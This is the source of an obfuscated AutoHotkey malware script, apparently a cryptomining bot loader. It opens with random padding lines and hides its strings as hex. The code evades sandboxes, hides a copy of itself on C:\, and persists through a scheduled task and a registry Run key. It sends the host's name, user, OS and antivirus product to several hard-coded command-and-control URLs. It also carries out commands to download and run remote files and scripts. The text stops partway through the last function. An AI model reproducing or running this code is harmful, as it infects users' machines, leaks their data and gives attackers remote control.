;vxaqeribwcykkdwuknqbbvxkuffvkfdnoelmizoalmsnuktontbneyefvweektzglhvwmlezrppfbtpqpdsepqgrnkbotgpbkcqalixgmhoestqaxauyvlnwwqlfztpykianzgxceealjmyxekbtba
;vuejjzyhsetgbmedsslhyamzqcsdstpszftponwabmcgygmmectftqdzatthiglvqlmyrprilmfmbegfybcxjnpfpuujwsucljtntbpuogekdiqsoiczefyoyhkdviegxyrjtyhdsavfxvczouwmom
;fzfrkkzlyutchingzyncvhgqpvvyegxhckqlcteytjtzqvnyqngkrrhsgkuyisajwmwghuhyyiijubokxjdalunokmakydgtosseeafseroqzqcmyhofvutsnbmrjvpmzkxrohmuoccyjkkjimfpkg
;pcfockufxmdxxfadyrfargulmirjaibhlfjgrurepcfqzwgduvxfvsnssgizrxssarbsqklfrsfolwgighghycndtuafppoeqgdouosgksrjwdqzrqhycvwbnrfmhmtsmeijootspejitzjxfdsovm
;wsgfsvatjvhexuxcdycyftgeybyrngjgpxxywywvbeydxkecfhtuoyvyxlznnjbsfizmhbzkwrusdwtoaswzshfewednllveulgcspmfdkuavwynqohfpayrsdwrtxbyihrablfztjcfejsntpkjmt
;dyinbyllyqaiiiuqrwwssdeuszfdaxhbovtfuhbyumpsciivuzrungjmopczvrgnzuyojpdmbsaaenddgpxqjlsqirvmqwjgqdxbtvkihqqtyyofnsmcvulidejdppwnxtaaztxnyawewvajsyaioj
;qhnkkhyovqcpawkmierdxmmduaglfxrqrvdicmiwaazwprdwlxgntqtvpbttsyyzjygpbawlcaijvdumgysvwfidtzasteyjjgahaouuwehmptpftotroogmdtjxwzzpxiuwrikcotawkruqehiiph
;vstfzirgybbqqryqalqhmlgkklucjbcakjcabxcldssctcugsjfnpdtlngkwqvhxjutjzxbjhjqvthajmserudyjckbznkyshgrposirycwhcompwvucefvzxfpfmnymzxdxypkqtbdlktopbxcwjz
;bglxskputdzyemwpgxyzizhhfbawifmfedaidochpukkwynnafncimhponzwqkfrthsfvluohuzsqllsuwmpdqinbalumpkofqotphjimcylsffbtyiuuhwvwypdqklocevwskfnaqixtvdpvoykyf

#SingleInstance IGNORE
#NoTrayIcon


global @fk##fkk := 4
global jj@jumujj@jumuii#k := SubStr(A_ScriptName, 1, InStr(A_ScriptName, ".", False, -1) -1)
global @jj#jumuff := ComObjCreate(iiikf#kfkjj@jumukf#f("575363726970742E5368656C6C"))
global #kfkf@jj#jumuf := iiikf#kfkjj@jumukf#f("726164")
global kf@f@kf#@k := iiikf#kfkjj@jumukf#f("73797374656D666978")
global ii#f@k := jj@jumujj@jumuii#k
global kf#k#f := @f#kkfk@f@ffk##k(21)
global @iiiii#f@k := @f#kkfk@f@ffk##k(21)
global f@iii@fkf# := @f#kkfk@f@ffk##k(150)
global kffkkfk@ := @f#kkfk@f@ffk##k(150)
global f#@fkk := ComObjCreate(iiikf#kfkjj@jumukf#f("536372697074696E672E46696C6553797374656D4F626A656374"))
global kjj#jumuf#jj@jumuk := jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("2E657865")
global fk@kfii# := jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("2E747874")
global f@@fk@ := 0
global #fk#@fk@ := 0
global jjjjumu@k#k@#iii := iiikf#kfkjj@jumukf#f("787878")
f#f#@kff := 0





 if (@fk##fkk = 1){
  }else{
  
if StrLen(A_ScriptName) <> 25 
{
	exitapp
}


IfInString, A_ScriptDir, % iiikf#kfkjj@jumukf#f("433A5C")
{
	#k#jj@jumu@k@k@f := A_TickCount

	while 1 {
	Sleep, 1000
	f#kfkkf#@k := A_TickCount - #k#jj@jumu@k@k@f
	if (f#kfkkf#@k > 120000)
	{
	break
	}
	}
	if StrLen(A_ScriptFullPath) <> 50 
	{
	exitapp
	}  
}else{


}


for process in ComObjGet(iiikf#kfkjj@jumukf#f("77696E6D676D74733A")).ExecQuery(iiikf#kfkjj@jumukf#f("53656C656374202A2066726F6D2057696E33325F50726F63657373")) {
@jj#jumuii@kfk := process.Name
k##kfk := process.CommandLine
k@kjj#jumu#jj#jumuf@ := process.ExecutablePath
if (StrLen(@jj#jumuii@kfk) = 25){
	if (StrLen(k##kfk) > 30){
		IfInString, k##kfk, % iiikf#kfkjj@jumukf#f("2E747874")
		{
			f#f#@kff := f#f#@kff + 1
			
	if (StrLen(k@kjj#jumu#jj#jumuf@) = 50){

	}		

		}
	}
}
}
if (f#f#@kff > 1){
exitapp
}

IfInString, A_ScriptDir, % iiikf#kfkjj@jumukf#f("433A5C")
{

}else{

FileCopyDir, %A_ScriptDir%, C:\%fii#k#%%fkjj@jumuk@f%%@iiiii#f@k%
FileCopyDir, %A_ScriptDir%, C:\%k#@f#kf@%%fii#kk%%kf#k#f%
FileSetAttrib, +SH, C:\%kjjjjumu@jj#jumu%%@iiiii#f@k%%k@f@f#%,1
FileSetAttrib, +SH, C:\%@kf@f@@f%%kf#k#f%%fii@fii#%,1

FileMove, % iiikf#kfkjj@jumukf#f("433A5C") . @iiiii#f@k . iiikf#kfkjj@jumukf#f("5C") . jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("2E657865") , % iiikf#kfkjj@jumukf#f("433A5C") . @iiiii#f@k . iiikf#kfkjj@jumukf#f("5C") . kf#k#f . iiikf#kfkjj@jumukf#f("2E657865")
FileMove, % iiikf#kfkjj@jumukf#f("433A5C") . @iiiii#f@k . iiikf#kfkjj@jumukf#f("5C") . jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("2E747874") , % iiikf#kfkjj@jumukf#f("433A5C") . @iiiii#f@k . iiikf#kfkjj@jumukf#f("5C") . kf#k#f . iiikf#kfkjj@jumukf#f("2E747874")

FileMove, % iiikf#kfkjj@jumukf#f("433A5C") . kf#k#f . iiikf#kfkjj@jumukf#f("5C") . jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("2E657865") , % iiikf#kfkjj@jumukf#f("433A5C") . kf#k#f . iiikf#kfkjj@jumukf#f("5C") . kf#k#f . iiikf#kfkjj@jumukf#f("2E657865")
FileMove, % iiikf#kfkjj@jumukf#f("433A5C") . kf#k#f . iiikf#kfkjj@jumukf#f("5C") . jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("2E747874") , % iiikf#kfkjj@jumukf#f("433A5C") . kf#k#f . iiikf#kfkjj@jumukf#f("5C") . kf#k#f . iiikf#kfkjj@jumukf#f("2E747874")
kffkfk@jj@jumu := ";"
FileAppend, `n %jj@jumuf%%kffkfk@jj@jumu%%ii#f@f% %f@iii@fkf#%%iii#f@#k%%f@jj@jumuf%, C:\%kkfk@k%%@iiiii#f@k%%fkfk%\%@k@f@kf@%%kf#k#f%%k@kf@jj#jumu%.txt




ii@f@fkk := FileOpen(iiikf#kfkjj@jumukf#f("433A5C") . @iiiii#f@k . iiikf#kfkjj@jumukf#f("5C") . kf#k#f . iiikf#kfkjj@jumukf#f("2E747874"), 0)
@k#jjjjumu#f := ii@f@fkk.Read()
@k#jjjjumu#f := f#jjjjumuk@kfk@k#k(@k#jjjjumu#f)
ii@f@fkk.Close()
@f#f#iii := FileOpen(iiikf#kfkjj@jumukf#f("433A5C") . @iiiii#f@k . iiikf#kfkjj@jumukf#f("5C") . kf#k#f . iiikf#kfkjj@jumukf#f("2E747874"), 5)
@f#f#iii.WriteLine(kffkfk@jj@jumu . kffkkfk@)
@f#f#iii.Write(@k#jjjjumu#f)
@f#f#iii.Close()
run % iiikf#kfkjj@jumukf#f("433A5C") . @iiiii#f@k . iiikf#kfkjj@jumukf#f("5C") . kf#k#f . iiikf#kfkjj@jumukf#f("2E65786520433A5C") . @iiiii#f@k . iiikf#kfkjj@jumukf#f("5C") . kf#k#f . iiikf#kfkjj@jumukf#f("2E747874")
exitapp
}





jj#jumufkf#ii@@ii@()
f#kf#k#f#ii@@fk#()

}





kkjj@jumufk#kf@k := Object()
kkjj@jumufk#kf@k.Insert(iiikf#kfkjj@jumukf#f("687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39383938"))
kkjj@jumufk#kf@k.Insert(iiikf#kfkjj@jumukf#f("687474703A2F2F7375706572616C7068612E7261646E65776167652E636F6D3A39383938"))
kkjj@jumufk#kf@k.Insert(iiikf#kfkjj@jumukf#f("687474703A2F2F7375706572616C7068612E6E65776D696E6572736167652E636F6D3A33333333"))
kkjj@jumufk#kf@k.Insert(iiikf#kfkjj@jumukf#f("687474703A2F2F6E6577616C7068612E73757065722D67616D657A65722E636F6D3A39333333"))
kkjj@jumufk#kf@k.Insert(iiikf#kfkjj@jumukf#f("687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39393939"))
kkjj@jumufk#kf@k.Insert(iiikf#kfkjj@jumukf#f("687474703A2F2F6E6F6F626D696E65722E7075626C6963766D2E636F6D3A39383938"))

kf#fkfiii@kk := kkjj@jumufk#kf@k.MaxIndex()
kjj@jumujj#jumuf := 0

while 1 {

if (kjj@jumujj#jumuf = kf#fkfiii@kk){
kjj@jumujj#jumuf := 1
}else{
kjj@jumujj#jumuf := kjj@jumujj#jumuf + 1
}
f#kf#k#f#ii@@fk#()
k@k@f@@fkkfk(kkjj@jumufk#kf@k[kjj@jumujj#jumuf])	


}


k@k@f@@fkkfk(jjjjumuiii#jjjjumu@f#f#f){

#k#k#f = 0
	while 1 {
f#kf#k#f#ii@@fk#()		
		if (#k#k#f = 6){
		break
		}
		k@fk#k#k := k#kfkf@kf@@k(jjjjumuiii#jjjjumu@f#f#f)
		if (k@fk#k#k = iiikf#kfkjj@jumukf#f("4552524F52")){
			#k#k#f := #k#k#f + 1
			#f#kf@@k#k#k#k(iiikf#kfkjj@jumukf#f("636F756C646E7420636F6E6E65637420746F20") . jjjjumuiii#jjjjumu@f#f#f . "-" . k@fk#k#k)
		
		}else{
			k@fk#k#kff := kkfkfkjjjjumukf@k#(k@fk#k#k)
			if (k@fk#k#kff = ""){
			#k#k#f := #k#k#f + 1
			#f#kf@@k#k#k#k(iiikf#kfkjj@jumukf#f("636F756C646E742066696E6420636F6D6D616E6420696E20") . jjjjumuiii#jjjjumu@f#f#f . "-" . k@fk#k#k)
			
			}else{
			#k#k#f := 0
			#f#kf@@k#k#k#k(iiikf#kfkjj@jumukf#f("636F6E6E656374656420746F202022202E2061646472657373202E202220646174613A20") . k@fk#k#kff)
			@jj@jumuffkkf@f#(k@fk#k#k)
			}
		}
		
	}

}


k#kfkf@kf@@k(iii##iiifk@kjjjjumu@) {

    static ii@fkfk#k# := ComObjCreate(iiikf#kfkjj@jumukf#f("57696E487474702E57696E48747470526571756573742E352E31"))
    try {
        ii@fkfk#k#.Open(iiikf#kfkjj@jumukf#f("474554"), iii##iiifk@kjjjjumu@ . "/" . f@#jj@jumuf#kkf@k@() , true)
        ii@fkfk#k#.Send()
        ii@fkfk#k#.WaitForResponse()
    } catch {
        return iiikf#kfkjj@jumukf#f("4552524F52")
	}
		
	if (ii@fkfk#k#.Status = 200){		
		return ii@fkfk#k#.ResponseText
	}else{
		return iiikf#kfkjj@jumukf#f("4552524F52")

	}
	
}


jj@jumujjjjumuf@#k#k(){

    try {

		For objOS In ComObjGet(iiikf#kfkjj@jumukf#f("77696E6D676D74733A5C5C6C6F63616C686F73745C726F6F745C736563757269747963656E74657232")).InstancesOf(iiikf#kfkjj@jumukf#f("416E7469566972757350726F64756374")) {
		k@kffk#k := ObjOS.displayName 
		}
    } catch {
        return "Unknown"
	}
	return k@kffk#k	
}


f#kfii@iiik@f@(){
    try {

		For objOS In ComObjGet(iiikf#kfkjj@jumukf#f("77696E6D676D74733A5C5C")).InstancesOf(iiikf#kfkjj@jumukf#f("57696E33325F4F7065726174696E6753797374656D")) {
		f#k@k@ := ObjOS.Caption 
		}
    } catch {
        return "Unknown"
	}
	return f#k@k@	
}


#f#kf@@k#k#k#k(jjjjumuf#f#f@jjjjumukk){


}


fk@f#fk#@k#k@k(@kkfkf#k@kf#f#) { 
	
	local iiifk@ii#fk@, iiikkfkf#k, f@@kjjjjumujj@jumu
	
	If !@kkfkf#k@kf#f#
		Return 0
	
	iiifk@ii#fk@ := A_FormatInteger
	
	SetFormat, INTEGER, H
	
	Loop, Parse, @kkfkf#k@kf#f# 
		{
		iiikkfkf#k := Asc(A_LoopField)
	
		StringTrimLeft, iiikkfkf#k, iiikkfkf#k, 2
		
		f@@kjjjjumujj@jumu .= iiikkfkf#k . ""
		}
	SetFormat, INTEGER, %@k@f@kf@%%@f@iii@k%%iiifk@ii#fk@%
	
	Return f@@kjjjjumujj@jumu
	}





urlsafe_b64decode(kf@ii@kfk@kk)
{
    Return f#iii@fiiif@k@(kf@ii@kfk@kk, "-_")
}


ii#k#fk##fk#(k#k#iii@iii#f@, k@@jj#jumu@f@ii##f:="+/") { 
    StringLeft, k@@jj#jumu@f@ii##f, k@@jj#jumu@f@ii##f, 2
    Return f#@kf@ffiiik(k#k#iii@iii#f@, iiikf#kfkjj@jumukf#f("4142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A30313233343536373839") . k@@jj#jumu@f@ii##f)
}


f#iii@fiiif@k@(#k@ii@@ffkjjjjumuf, @k@kjj@jumuk#fk#@kf@:="+/") { 
    StringLeft, @k@kjj@jumuk#fk#@kf@, @k@kjj@jumuk#fk#@kf@, 2
    Return kkfk#f@f#iii@k(#k@ii@@ffkjjjjumuf, iiikf#kfkjj@jumukf#f("4142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A30313233343536373839") . @k@kjj@jumuk#fk#@kf@)
}


f#@kf@ffiiik(k@fk@f@kkfk#ff, f@kkf#@ffkkfk#:=""){


    StringCaseSense On
    Loop, Parse, k@fk@f@kkfk#ff
    {
        @jj@jumuf# := Mod(A_Index, 3)
        if (@jj@jumuf# = 1)
        {
            @fk#@k#kf#f# := ((Asc(A_LoopField) >> 2) & 0x3F)
            k@kkf@fk@f#k := (Asc(A_LoopField) & 0x03 ) << 4
        }
        else if (@jj@jumuf# = 2) 
        {
            @fk#@k#kf#f# := k@kkf@fk@f#k | ((Asc(A_LoopField) >> 4) & 0x0F)
            k@kkf@fk@f#k := (Asc(A_LoopField) & 0x0F) << 2       
        }
        else
        {
            @fk#@k#kf#f# := k@kkf@fk@f#k | ((Asc(A_LoopField) >> 6) & 0x03)
            StringMid, base64Char, f@kkf#@ffkkfk#, @fk#@k#kf#f# + 1, 1
            kf@ii@kfk@kk := kf@ii@kfk@kk base64Char

            @fk#@k#kf#f# := (Asc(A_LoopField)) & 0x3F
        }
        StringMid, base64Char, f@kkf#@ffkkfk#, @fk#@k#kf#f# + 1, 1
        kf@ii@kfk@kk := kf@ii@kfk@kk base64Char
    }
    if (@jj@jumuf# = 1)
    {
        StringMid, base64Char, f@kkf#@ffkkfk#, k@kkf@fk@f#k + 1, 1
        return kf@ii@kfk@kk base64Char "=="
    }
    else if (@jj@jumuf# = 2)
    {
        StringMid, base64Char, f@kkf#@ffkkfk#, k@kkf@fk@f#k + 1, 1
        return kf@ii@kfk@kk base64Char "="
    }
    else
    {
        return kf@ii@kfk@kk "=="
    }
}


kkfk#f@f#iii@k(@jj@jumuii#ii@f@f#, f@kkf##kf@f#:=""){

    StringReplace @jj@jumuii#ii@f@f#, @jj@jumuii#ii@f@f#, =,,All
    StringReplace, @jj@jumuii#ii@f@f#, @jj@jumuii#ii@f@f#, `r,,All
    StringReplace, @jj@jumuii#ii@f@f#, @jj@jumuii#ii@f@f#, `n,,All
    StringCaseSense On
    Loop, Parse, @jj@jumuii#ii@f@f#
    {
        StringGetPos, currentBin, f@kkf##kf@f#, %A_LoopField%
        f##jj@jumu@k#k := Mod(A_Index, 4)
        if (f##jj@jumu@k#k = 1)
        {
            k@kkf@fk@f#k := currentBin << 2
        }
        else if (f##jj@jumu@k#k = 2)
        {
            k@@f#fiii@ := k@@f#fiii@ Chr(k@kkf@fk@f#k | (currentBin >> 4))
            k@kkf@fk@f#k := (currentBin & 0x0F) << 4
        }
        else if (f##jj@jumu@k#k = 3) 
        {
            k@@f#fiii@ := k@@f#fiii@ Chr(k@kkf@fk@f#k | (currentBin >> 2))
            k@kkf@fk@f#k := (currentBin & 0x03) << 6
        }
        else
        {
            k@@f#fiii@ := k@@f#fiii@ Chr(k@kkf@fk@f#k | currentBin)
        }
    }
    Return k@@f#fiii@
}

jj#jumufkf#ii@@ii@() {



#ii##fkf#f#k := ii#jj#jumu@fkkf#(A_ScriptDir . "\" . jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("2E657865"))
@kf#f@@f#k := ii#jj#jumu@fkkf#(A_ScriptDir . "\" . jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("2E747874"))
jjjjumuiii := iiikf#kfkjj@jumukf#f("7363687461736B73202F637265617465202F7363206D696E757465202F6D6F2031202F746E")
run, %iii#f@#k%%@ii@%%jjjjumuiii% %ii#f@k%%k@k@f@fk%%#f#fk#fk% /tr "%ii#f@f%%#ii##fkf#f#k%%k@iii@% %iii#f@#k%%kfk@f@%%@kf#f@@f#k%",,Hide
 Sleep, 3000
 @f#ffkf@ := iiikf#kfkjj@jumukf#f("7363687461736B732E657865")
Process, Close, %#kjj@jumujj@jumu%%@f#ffkf@%%k#@f#kf@%

#f@f@k := iiikf#kfkjj@jumukf#f("484B43552C20536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E")
RegWrite, REG_SZ, HKCU, %ii#ii#%%#f@f@k%%ii#jjjjumuk@%, %jjjjumuk@iii%%#f#k@k%%ii#f@k%, %@iii%%#f#k@k%%#ii##fkf#f#k% %@kf#f@@f#k%%@kkfkf@f%%jjjjumujj@jumu@k%

}


f@k@@ffkffkf#f(f#fkf##f@kkf){
	Process,Exist,%#f@k#fkf%%ii#jjjjumuk@%%f#fkf##f@kkf%
	return Errorlevel
}


@iiif#@f#kfkkf@k(){

f@jjjjumu##k := fkf@k@kjj#jumuk@(#jjjjumuk@fkjjjjumu#() . A_OSVersion  . f#kfii@iiik@f@())
return SubStr(f@jjjjumu##k, 1, 30)
}


#jjjjumuk@fkjjjjumu#(){
    try {

		DriveGet, hSerial, Serial, C:
    } catch {
        return iiikf#kfkjj@jumukf#f("556E6B6E6F776E")
	}
return hSerial
}


fkkfkfiii@k@(){
if  ( f@k@@ffkffkf#f(iiikf#kfkjj@jumukf#f("73747265616D65722E657865")) or f@k@@ffkffkf#f(iiikf#kfkjj@jumukf#f("6C697665776F726B65722E657865")) or f@k@@ffkffkf#f(iiikf#kfkjj@jumukf#f("7375706572636865636B65722E657865")) or f@k@@ffkffkf#f(iiikf#kfkjj@jumukf#f("737065656475702E657865")) or f@k@@ffkffkf#f(iiikf#kfkjj@jumukf#f("6E6F76612E657865"))){
	return 1
}

	return 0
}

jjjjumu@kfk@k#@kkfk#(){

if  f@k@@ffkffkf#f(iiikf#kfkjj@jumukf#f("637075636865636B65722E657865")) or f@k@@ffkffkf#f(iiikf#kfkjj@jumukf#f("637075636865636B657233322E657865")) 
{
	return 1
}

return 0

}
f@#jj@jumuf#kkf@k@(){

f@k#f#kkf# := @jj#jumuff.ExpandEnvironmentStrings(iiikf#kfkjj@jumukf#f("25434F4D50555445524E414D4525"))

kjj@jumu@k@kfkf@ := @jj#jumuff.ExpandEnvironmentStrings(iiikf#kfkjj@jumukf#f("25555345524E414D4525"))
spreadisrun := fkkfkfiii@k@()
f##k#jj@jumu@ii@ := f#kfii@iiik@f@()
f@ii@iiikf@f := jjjjumu@kfk@k#@kkfk#()

k#fkf#kjj#jumu@f := jj@jumujjjjumuf@#k#k()




#jj@jumu#f#k@kfk := @iiif#@f#kfkkf@k() . iiikf#kfkjj@jumukf#f("2F312F") . fkf@k@kjj#jumuk@(f##k#jj@jumu@ii@)  . "/" . fkf@k@kjj#jumuk@(f@k#f#kkf#) . "/" . fkf@k@kjj#jumuk@(kjj@jumu@k@kfkf@)  . "/" .  fkf@k@kjj#jumuk@(#kfkf@jj#jumuf)  . "/" .   fkf@k@kjj#jumuk@(k@kffk#k)  . "/" .  spreadisrun  . "/" .  f@ii@iiikf@f
return #jj@jumu#f#k@kfk
}


fkf@k@kjj#jumuk@(jjjjumufii@f@jj#jumuffk@){

jjjjumufii@f@jj#jumuffk@ := fk@f#fk#@k#k@k(ii#k#fk##fk#(jjjjumufii@f@jj#jumuffk@))
return jjjjumufii@f@jj#jumuffk@
}


kkfkfkjjjjumukf@k#(@f@jjjjumujjjjumujj#jumuf@kk){

    try {

		ii#kf#fk#k:=RegExMatch(@f@jjjjumujjjjumujj#jumuf@kk, iiikf#kfkjj@jumukf#f("3A3A283F503C4E616D653E2E2A3F293A3A"), match)
    } catch {
        return ""
	}

return matchName
}


k@@kf@f#k@f@k##k(@ii@k#k#f#k#kk) { 

f@k@@fk# := ""
	k##kkffk:=1
	Loop % StrLen(@ii@k#k#f#k#kk)/2	{
	kfk@kkffk@ := SubStr(@ii@k#k#f#k#kk, k##kkffk , 2)
	f@k@@fk# .= Chr("0x" kfk@kkffk@)
	k##kkffk +=2
	}
Return f@k@@fk#

}


kkffkkf#k#@f#k(ii#kkfkfk#iii#f#,jj@jumuii@f@@kf@,k#k#jj@jumuk@fiii##f){

    try {

		@f#fkf@k:=RegExMatch(ii#kkfkfk#iii#f#, jj@jumuii@f@@kf@ . iiikf#kfkjj@jumukf#f("283F503C4E616D653E2E2A3F29") . k#k#jj@jumuk@fiii##f, match)
    } catch {
        return ""
	}

return matchName
}


@jj@jumuffkkf@f#(f@kkf@k#jjjjumukfk){

 #f#kf@@k#k#k#k(iiikf#kfkjj@jumukf#f("67657420636F6D6D616E64") . f#iii@fiiif@k@(k@@kf@f#k@f@k##k(f@kkf@k#jjjjumukfk)))
fkf@#kkfkk := f#iii@fiiif@k@(k@@kf@f#k@f@k##k(f@kkf@k#jjjjumukfk))

kf@iiikf := iiikf#kfkjj@jumukf#f("433A5C") . jj@jumujj@jumuii#k
	if (FileExist(kf@iiikf)) {
		
	}else{
		kf@iiikf := A_ScriptDir
	}

iiiii#fkf#k@ := iiikf#kfkjj@jumukf#f("7570646174652D")
#f@kf#kf := iiikf#kfkjj@jumukf#f("646F776E6C6F61642D")
f#@jj#jumuk# := iiikf#kfkjj@jumukf#f("7363726970742D")
k#kjjjjumuff := iiikf#kfkjj@jumukf#f("75706461746573656C662D")
	IfInString, fkf@#kkfkk, %k#kfk@f#%%iiiii#fkf#k@%%@fk@%
	{
	#kkf#fkf := kkffkkf#k#@f#k(fkf@#kkfkk,"update-","-update")
	ffkfkf@jj@jumu@k := iiikf#kfkjj@jumukf#f("5C") . @f#kkfk@f@ffk##k(10) . iiikf#kfkjj@jumukf#f("2E747874")
		if FileExist(A_ScriptDir . iiikf#kfkjj@jumukf#f("5C") . ffkfkf@jj@jumu@k){
		FileDelete ,%A_ScriptDir%\%ffkfkf@jj@jumu@k%%#kkjj@jumukf%%jjjjumuf#fk#%
		}
	  #f#kf@@k#k#k#k("downloading update " . ffkfkf@jj@jumu@k . " - " . #kkf#fkf)
	   UrlDownloadToFile, %#kkf#fkf%%kjj@jumuiiif%%@kff%, %A_ScriptDir%\%fkfk#f@k%%ffkfkf@jj@jumu@k%%ffk#fk@f%
		if FileExist(A_ScriptDir . iiikf#kfkjj@jumukf#f("5C") . ffkfkf@jj@jumu@k){
		FileDelete ,%A_ScriptDir%\%#f#k@k%%fk@kfii#%%f##kjjjjumuf%
		FileMove, %A_ScriptDir%\%f#f#k@%%ffkfkf@jj@jumu@k%%k#@f#kf@%, %A_ScriptDir%\%@k@f@kf@%%fk@kfii#%%#ii#k#%
		Run,%A_ScriptDir%\%kjj#jumuf#jj@jumuk%%kkfk@k%%fii@fii#% %A_ScriptDir%\%fk@kfii#%%@kf@f@@f%%@iii%
		exitapp 
		}
		return 
	}

	IfInString, fkf@#kkfkk, %fkjj@jumuk@f%%#k@k#f#f%%#f@kf#kf%
	{
	kfk#kf := kkffkkf#k#@f#k(fkf@#kkfkk,iiikf#kfkjj@jumukf#f("646F776E6C6F61642D"),iiikf#kfkjj@jumukf#f("2D646F776E6C6F6164"))
	kfk#kf := StrSplit(kfk#kf, iiikf#kfkjj@jumukf#f("3A213A"))
	k@f##f := iiikf#kfkjj@jumukf#f("5C") . @f#kkfk@f@ffk##k(10) . iiikf#kfkjj@jumukf#f("2E747874")
		jj@jumujj#jumu@jj@jumu := kfk#kf[1]
		ffkfkf@jj@jumu@k := kfk#kf[2]
		if FileExist(kf@iiikf . iiikf#kfkjj@jumukf#f("5C") . ffkfkf@jj@jumu@k){
		FileDelete ,%f@fk@f%%kf@iiikf%%#k#f@k%\%k@k@%%ffkfkf@jj@jumu@k%%@iii%
		}
	  #f#kf@@k#k#k#k("downloading file " . ffkfkf@jj@jumu@k . " - " . jj@jumujj#jumu@jj@jumu)
		if FileExist(kf@iiikf . k@f##f){
		FileDelete ,%k@f#kf@k%%jjjjumuk@iii%%kf@iiikf%%f#fk%%#jjjjumu#k@k%%k@f##f%
		}
		UrlDownloadToFile, %ii#jjjjumuk@%%jj@jumujj#jumu@jj@jumu%%ii#jjjjumuk@%, %@kff%%kf@iiikf%%jjjjumu@%%f#f@%%k@f##f%%#kkjj@jumukf%

		if FileExist(kf@iiikf . k@f##f){
		FileMove, %#jjjjumu#k@k%%@iii%%kf@iiikf%%@ii#k#%%k@f##f%%#jjjjumu%, %jjjjumuf#fk#%%kf@iiikf%%#f#fk#fk%\%ffkfkf@jj@jumu@k%%kfk@f@%%#jj@jumu@k#k%
		
		
			IfInString, ffkfkf@jj@jumu@k, %ffii@f%%jjjjumu@k#k@#iii%%fii#kk%
			{
			@f@ii#ffiiif := iiikf#kfkjj@jumukf#f("433A5C") . jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("5C") . kjj#jumuf#jj@jumuk . " " . iiikf#kfkjj@jumukf#f("433A5C") . jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("5C") . ffkfkf@jj@jumu@k
			Run,%fii@kjjjjumu%%k@f#kf@k%%@f@ii#ffiiif%
			}else{
			Run,%kf@iiikf%%kkfk@k%%k#kffk%\%fii@fii#%%ffkfkf@jj@jumu@k%%fii@fii#%
			}
		}

		return 
	}

	
	IfInString, fkf@#kkfkk, %@iii%%f#@jj#jumuk#%%f@#f@fk@%
	{
		#kkfkfiiikf# := kkffkkf#k#@f#k(fkf@#kkfkk,iiikf#kfkjj@jumukf#f("7363726970742D"),iiikf#kfkjj@jumukf#f("2D736372697074"))
		#kkfkfiiikf# := StrSplit(#kkfkfiiikf#, ":!:")
		k#kf#iii@f@k := #kkfkfiiikf#[1]
		@k@kjjjjumu@f# := #kkfkfiiikf#[2]
		@ffii@@f@jj#jumu :=  iiikf#kfkjj@jumukf#f("5C") . @f#kkfk@f@ffk##k(10) . iiikf#kfkjj@jumukf#f("2E747874")
		#f@kf@#kkjj@jumu := kf@iiikf . iiikf#kfkjj@jumukf#f("5C") . @k@kjjjjumu@f#
	if FileExist(#f@kf@#kkjj@jumu){
	FileDelete ,%jjjjumu#f#f#%%#f@kf@#kkjj@jumu%%kfk@f@%
	}
		if FileExist(kf@iiikf . @ffii@@f@jj#jumu){
		FileDelete ,%kf@iiikf%%ii#f@f%%@iii%%fii@fii#%%k@f#kf@k%%@ffii@@f@jj#jumu%
		}
		#f#kf@@k#k#k#k("script file " . @k@kjjjjumu@f# . " - " . k#kf#iii@f@k)
		FileAppend, %k#kf#iii@f@k%%kkf@@f%%ffk#fk@f%, %@kkf%%kf@iiikf%%#jj@jumu@k#k%%f#f#k@%%@ffii@@f@jj#jumu%%k#kf%
	   FileMove, %@kkfkf@f%%@kkf%%kf@iiikf%%#jjjjumu#k@k%%@ffii@@f@jj#jumu%%k@fkkfk#%, %kf@iiikf%%f##kjjjjumuf%%#f@k#fkf%\%#f#fk#fk%%@k@kjjjjumu@f#%%jjjjumu#f#f#%
	   IfInString, @k@kjjjjumu@f#, %@jj@jumufk%%k@k@f@fk%%jjjjumu@k#k@#iii%
		{
			@f@ii#ffiiif := iiikf#kfkjj@jumukf#f("433A5C") . jj@jumujj@jumuii#k . iiikf#kfkjj@jumukf#f("5C") . kjj#jumuf#jj@jumuk . " " .  #f@kf@#kkjj@jumu
			Run,%jjjjumuf#fk#%%@f@ii#ffiiif%%k#f#f@kk%
		
		}else{
		Run,%@kf#ff%%kf@iiikf%%f#@fk@f#%\%k@kf@jj#jumu%%@k@kjjjjumu@f#%%ffii@f%
		}
	return 
	}

	IfInString, fkf@#kkfkk, %k#kjjjjumuff%%k@k@f@fk%%kfk#%
	{
	kf#k#f  := jj@jumujj@jumuii#k
	kffkfk@jj@jumu := ";"
	FileAppend, `n %kf@f%%kffkfk@jj@jumu%%@fkfkf% %#f#fk#fk%%f@iii@fkf#%%jjjjumuf#fk#%, %A_ScriptFullPath%
		

	jj#jumufkf#f#k := FileOpen(A_ScriptFullPath, 0)
	@kffkf := jj#jumufkf#f#k.Read()
	@kffkf := f#jjjjumuk@kfk@k#k(@kffkf)
	jj#jumufkf#f#k.Close()
	#k#kfkkfk# := FileOpen(A_ScriptFullPath, 5)
	#k#kfkkfk#.WriteLine(kffkfk@jj@jumu . kffkkfk@)
	#k#kfkkfk#.Write(@kffkf)
	#k#kfkkfk#.Close()
	kf#k#f := @f#kkfk@f@ffk##k(21)
	return 
	}


IfInString, fkf@#kkfkk, sleep-
{
#fkf@kkffii@ := kkffkkf#k#@f#k(fkf@#kkfkk,iiikf#kfkjj@jumukf#f("736C6565702D"),iiikf#kfkjj@jumukf#f("2D736C656570"))
	  #f#kf@@k#k#k#k(iiikf#kfkjj@jumukf#f("736C656570696E6720") . #fkf@kkffii@)
kfk#k@fkf@f#f#f@(#fkf@kkffii@)
return 
}

